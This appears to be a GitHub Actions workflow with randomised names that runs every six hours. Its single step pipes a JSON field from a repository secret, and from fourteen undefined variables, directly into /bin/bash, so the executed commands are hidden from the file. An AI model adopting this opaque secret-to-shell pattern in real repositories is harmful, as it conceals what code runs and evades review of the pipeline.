name: qinxunji4187

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qinxunji4187
        env:
          ybk1311: ${{ secrets.ybk1311 }}
        run: |
          echo $ybk1311 | jq -r .k73 | /bin/bash
          echo $qc58 | jq -r .ggboz12601 | /bin/bash
          echo $xqlw01 | jq -r .vdbdv62357 | /bin/bash
          echo $a5139 | jq -r .cwld9 | /bin/bash
          echo $bui951 | jq -r .fiqxx627 | /bin/bash
          echo $jengf0457 | jq -r .lgg70 | /bin/bash
          echo $y02056 | jq -r .peox343 | /bin/bash
          echo $a26928 | jq -r .xozxh41479 | /bin/bash
          echo $hun4804 | jq -r .skolr3340 | /bin/bash
          echo $wyixw16606 | jq -r .bb1 | /bin/bash
          echo $skoab72 | jq -r .s2754 | /bin/bash
          echo $fktvw5399 | jq -r .yvkw92855 | /bin/bash
          echo $nc154 | jq -r .cab82994 | /bin/bash
          echo $d506 | jq -r .xxtqn20 | /bin/bash
          echo $tkvy2815 | jq -r .jip87 | /bin/bash

